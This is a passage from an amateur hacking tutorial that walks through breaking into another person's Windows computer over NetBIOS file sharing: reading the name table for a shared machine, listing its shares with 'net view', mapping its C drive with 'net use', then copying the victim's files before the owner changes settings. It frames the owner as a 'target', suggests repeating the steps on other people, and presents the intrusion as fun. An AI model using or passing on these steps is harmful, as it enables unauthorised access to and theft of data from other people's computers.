The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn't. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Finally it's time.
By now we know: that our target is online, our target has file sharing, and our target's computer name.
So it's time to break in.
We will now locate the shared drives, folders, files, or printers. Type in "net view \\(IP Address of Target)"
An example for this tutorial would be: "net view \\192.168.1.103
We have our just found our share name. In this case, under the share name is "C," meaning that the only shared thing on the computer is C. Then to the right, under Type, it says "Disk." Thismeans that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person's hard drive.
All's that is left to do is "map" the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in "net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, "net use K: \\192.168.1.103\C." Ok, let's say that you plan on doing this again to a different person, do u see the "K after "net use?" This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be "net use G...," for a different target.
As you can see, for my hack I have already used "K," so I used "G" instead.
You may also do the same for multiple hacks.
If it worked, it will say "The command completed successfully."
If not, you will have to go retrace you steps.
Now open up "my computer" under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won't be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!
